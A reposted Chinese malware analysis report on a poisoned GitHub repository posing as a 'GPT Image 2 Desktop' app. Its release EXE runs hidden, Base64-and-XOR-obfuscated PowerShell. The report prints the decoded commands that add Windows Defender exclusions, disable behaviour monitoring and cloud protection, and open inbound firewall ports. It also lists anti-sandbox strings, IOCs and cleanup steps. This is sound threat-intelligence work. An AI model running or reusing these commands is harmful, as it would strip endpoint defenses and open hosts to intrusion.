gpt-image-2-desktop投毒分析报告

admin 2026-07-13 05:04:26 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该报告分析了一个名为gpt-image-2-desktop的GitHub仓库,其Release二进制被判定为高度恶意投毒样本。仓库源码与宣传严重不符,实际为TensorFlowPython代码而非桌面应用。Release中的EXE文件未签名,内嵌隐藏PowerShell脚本,用于修改WindowsDefender配置、添加排除项、关闭安全功能并开放防火墙端口。仓库目前已不可公开访问。建议立即删除下载文件,若已运行则按失陷主机处理,并恢复安全配置。 综合评分: 100 文章分类: 恶意软件,应急响应,威胁情报


cover_image

gpt-image-2-desktop 投毒分析报告

z00000 z00000

安全光圈

2026年7月10日 18:00 中国台湾

在小说阅读器读本章

去阅读

gpt-image-2-desktop 投毒分析报告

分析时间:2026-07-10 分析对象:https://github.com/desktop-gpt-image-2/gpt-image-2-desktop 结论:该项目 Release 二进制高度恶意,应按投毒样本处理,不应运行。

结论摘要

该仓库 README 宣称提供 “GPT Image 2 Desktop” 桌面应用、签名安装包、零遥测和 OpenAI gpt-image-2 客户端能力。但实际源码与声明严重不一致:仓库源码只包含少量旧 TensorFlow/Python 图像模型代码,不是桌面应用。

此前从 Release 下载到的 Windows 样本 gpt-image-2_x64.7z 解压后只有一个 gpt-image-2_x64.exe。该 EXE 未签名,内嵌隐藏 PowerShell,使用 -WindowStyleHidden 和 -ExecutionPolicyBypass 执行混淆脚本。脚本解混淆后明确修改 Windows Defender 配置、添加排除项、关闭云查杀/行为监控/PUA 检测,并开放入站防火墙端口。这些行为足以判定为恶意或极高风险投毒。

当前文件状态

用户要求将临时分析文件移动到:

/Users/xxxxx/Documents/work/virus_analysis/gpt-image-2-desktop投毒分析

执行移动时,原 /tmp 中样本文件已经不存在或只剩空目录骨架。当前目录下保留的目录:

  • • gpt-image-2-desktop-audit/:首次移动过来的源码快照目录,但当前只剩目录骨架,没有普通文件。
  • • gpt-image-2-release/:首次移动过来的 Release 解压目录,但当前为空。

尝试重新获取样本时,原 GitHub 下载链接返回 404,GitHub API 查询仓库/Release 返回 Not Found,重新 git clone 返回认证失败。判断该仓库当前已不可公开访问,可能已被删除、转私有或封禁。

因此,本报告中的 EXE 静态证据来自此前同一会话中已完成的分析记录;当前磁盘上未能保留原始 EXE/7z 实体。

样本信息

此前观察到的 Release 资产:

  • • Release 文件名:gpt-image-2_x64.7z
  • • Release 文件大小:约 85,341,476 bytes
  • • Release 上传时间:2026-06-30 11:52:19 UTC
  • • Release API digest:sha256:c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29

此前本地下载并解压后观察到:

  • • 压缩包 SHA-256:c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29
  • • 解压文件:gpt-image-2_x64.exe
  • • EXE SHA-256:e27f1bc0d5e62dc401a3482f5b2c72697bb694f6d7cf1f45ca705a13cb8a0ce9
  • • 文件类型:PE32+ executable (GUI) x86-64, for MS Windows
  • • EXE 大小:约 92 MB
  • • 代码签名:未签名

仓库异常点

  • • README 宣称是 Windows/macOS 原生桌面应用,但仓库源码只有 src/run.pysrc/model.pysrc/utils.py 等 TensorFlow 1.x Python 文件。
  • • 无 Electron/Tauri/Swift/.NET/installer 构建配置。
  • • 无 package.json、锁文件、CI 构建脚本或可复现 Release 构建流程。
  • • README 提到签名安装器、公证、SHA-256 校验等,但 Release 中实际只有一个 Windows 7z 包。
  • • 仓库创建和提交集中在 2026-06-11 十分钟内完成,Release 二进制在 2026-06-30 后续上传。

此前记录到的提交时间线:

dbe34209f88d 2026-06-11T11:06:12Z gpt-image-2-desktop
809163bb727f 2026-06-11T11:02:00Z gpt-image-2-desktop
b98d56bef776 2026-06-11T11:01:48Z Delete src directory
18fdf18a4dba 2026-06-11T11:01:43Z Delete assets directory
84b501747643 2026-06-11T11:01:25Z pt-image-2-desktop
7384f4551c11 2026-06-11T11:01:03Z desktop-gpt-image-2
b1b603829dd0 2026-06-11T10:57:40Z Initial commit

关键静态证据

EXE 字符串中出现与宣传不一致的内容:

DRIVER UPDATE UTILITY - TECHNICAL DOCUMENTATION
This utility automatically checks for and installs hardware driver updates.
Disable antivirus temporarily if needed
Optimized download process for faster updates

EXE 字符串中出现隐藏 PowerShell 调用:

powershell.exe -NoProfile -NonInteractive -WindowStyleHidden -ExecutionPolicyBypass -Command ...

混淆方式:

  • • 变量 $uowuunxT 保存 Base64 字符串。
  • • [System.Convert]::FromBase64String($uowuunxT) 解码。
  • • 每个字节与 44 做 XOR。
  • • 生成的脚本随后执行。

解混淆后的 PowerShell 关键行为:

Add-MpPreference -ExclusionPath 'C:\Users'
Add-MpPreference -ExclusionPath "$env:TEMP"
Add-MpPreference -ExclusionPath 'C:\ProgramData'
Add-MpPreference -ExclusionPath 'C:\OneDriveTemp'
Add-MpPreference -ExclusionPath 'C:\Users\Public'
Add-MpPreference -ExclusionPath 'C:\Windows'

Add-MpPreference -ExclusionProcess 'powershell.exe'
Add-MpPreference -ExclusionProcess 'pwsh.exe'

Set-MpPreference -MAPSReporting 0
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -CloudBlockLevel 0
Set-MpPreference -PUAProtection disable
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableBehaviorMonitoring $true

New-NetFirewallRule -DisplayName 'Port 57001 TCP' -Direction Inbound -LocalPort 57001 -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -DisplayName 'Port 57002 TCP' -Direction Inbound -LocalPort 57002 -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -DisplayName 'Port 56001 TCP' -Direction Inbound -LocalPort 56001 -Protocol TCP -Action Allow -Enabled True

以上行为不是正常桌面图像生成客户端所需行为,属于典型防护绕过和环境放行。

其他可疑字符串

此前静态字符串中还观察到:

Failed to fetch conditional payload URL
APPDATA
Ledger Live
runas
--elevated
malware
virus
sandbox
cuckoo
SbieDll.dll
ollydbg.exe
x32dbg.exe
x64dbg.exe
windbg.exe
ida.exe
ida64.exe
processhacker.exe
procexp.exe
wireshark.exe
fiddler.exe
charles.exe
vmtoolsd.exe
vboxservice.exe
VirtualBox
Google Compute Engine
Virtual Machine

这些字符串提示样本可能包含条件载荷、提权/重试逻辑、钱包相关路径或反沙箱/反调试判断。由于未进行动态分析,以上作为辅助可疑迹象,不作为唯一判定依据。

导入表可疑点

此前 objdump -p 观察到导入项包括:

CreateProcessW
CreateThread
CreateMutexA
CreateToolhelp32Snapshot
Process32First
Process32Next
ShellExecuteW
RegOpenKeyExW
RegQueryValueExW
connect
send
recv
WSASend
VirtualProtect

这些 API 单独出现不必然恶意,但与隐藏 PowerShell、Defender 绕过、反分析字符串组合后,风险显著升高。

IOC

文件哈希:

gpt-image-2_x64.7z
c068ae9e5325400593b407ce7231e764e840485145a8a11113111ecaa2f8fc29

gpt-image-2_x64.exe
e27f1bc0d5e62dc401a3482f5b2c72697bb694f6d7cf1f45ca705a13cb8a0ce9

可疑防火墙端口:

57001/tcp
57002/tcp
56001/tcp

可疑 Defender 配置:

ExclusionPath: C:\Users
ExclusionPath: %TEMP%
ExclusionPath: C:\ProgramData
ExclusionPath: C:\OneDriveTemp
ExclusionPath: C:\Users\Public
ExclusionPath: C:\Windows
ExclusionProcess: powershell.exe
ExclusionProcess: pwsh.exe
MAPSReporting: 0
SubmitSamplesConsent: NeverSend
CloudBlockLevel: 0
PUAProtection: disable
DisableIOAVProtection: true
DisableBehaviorMonitoring: true
DisableBlockAtFirstSeen: true

处置建议

如果只是下载但未运行:

  • • 删除 gpt-image-2_x64.7z 和 gpt-image-2_x64.exe
  • • 不要从该仓库或镜像站下载任何 Release 资产。

如果已经在 Windows 上运行:

  • • 立即断网。

  • • 按已失陷主机处理。

  • • 检查并恢复 Windows Defender 配置:

  • • Defender 排除路径

  • • Defender 排除进程

  • • 云查杀/MAPS/样本提交/PUA/行为监控配置

  • • 检查并删除异常防火墙入站规则:

  • • Port 57001 TCP

  • • Port 57002 TCP

  • • Port 56001 TCP

  • • 检查启动项、计划任务、服务、C:\ProgramData%TEMP%C:\Users\Public、用户 AppData。

  • • 轮换该主机上使用过的密码、API Key、浏览器会话、钱包相关凭据。

  • • 如果运行时授予过管理员权限,建议重装系统并从可信备份恢复数据。

分析限制

  • • 未执行样本,未做动态沙箱分析。
  • • 当前 GitHub 仓库和 Release 已不可公开访问,无法重新下载样本复核。
  • • 当前磁盘目录未能保留原始 EXE/7z 文件;本报告基于此前同一会话中已记录的静态分析输出。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全光圈 z00000 z00000《gpt-image-2-desktop 投毒分析报告》

评论:0   参与:  0